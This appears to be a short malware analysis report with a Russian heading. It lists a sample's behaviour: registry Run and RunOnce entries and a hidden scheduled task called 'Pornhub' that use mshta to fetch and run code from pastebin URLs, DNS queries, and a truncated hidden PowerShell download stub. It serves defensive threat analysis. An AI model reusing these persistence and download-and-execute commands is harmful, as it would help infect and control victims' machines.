Техническая информация
- [<HKCU>\Software\Microsoft\Windows\CurrentVersion\Run] 'BACKup2' = '"mshta""http:\\pastebin.com\raw\wmU2hRgd"'
- [<HKCU>\Software\Microsoft\Windows\CurrentVersion\Run] 'BACKup3' = '"mshta""http:\\pastebin.com\raw\tYkUfaZy"'
- [<HKCU>\Software\Microsoft\Windows\CurrentVersion\RunOnce] '' = '"mshta""http:\\pastebin.com\raw\tYkUfaZy"'
- <SYSTEM32>\tasks\pornhub
- http://pa###bin.com/raw/C7a5vw9F
- DNS ASK pa###bin.com
- DNS ASK google.com
- '%WINDIR%\syswow64\schtasks.exe' /create /sc MINUTE /mo 80 /tn "Pornhub" /tr "\"'mshta\" http:\\pastebin.com\raw\C7a5vw9F" /F' (со скрытым окном)
- '%WINDIR%\syswow64\windowspowershell\v1.0\powershell.exe' do {$ping = test-connection -comp google.com -count 1 -Quiet} until ($ping);$p22 = [Enum]::ToObject([System.Net.SecurityProtocolType], 3072);[System.Net.ServicePointManager]::SecurityProtocol =...' (со скрытым окном)
- '%WINDIR%\syswow64\schtasks.exe' /create /sc MINUTE /mo 80 /tn "Pornhub" /tr "\"'mshta\" http:\\pastebin.com\raw\C7a5vw9F" /F
- '%WINDIR%\syswow64\mshta.exe' "http:\\pastebin.com\raw\C7a5vw9F"
- '%WINDIR%\syswow64\windowspowershell\v1.0\powershell.exe' do {$ping = test-connection -comp google.com -count 1 -Quiet} until ($ping);$p22 = [Enum]::ToObject([System.Net.SecurityProtocolType], 3072);[System.Net.ServicePointManager]::SecurityProtocol =...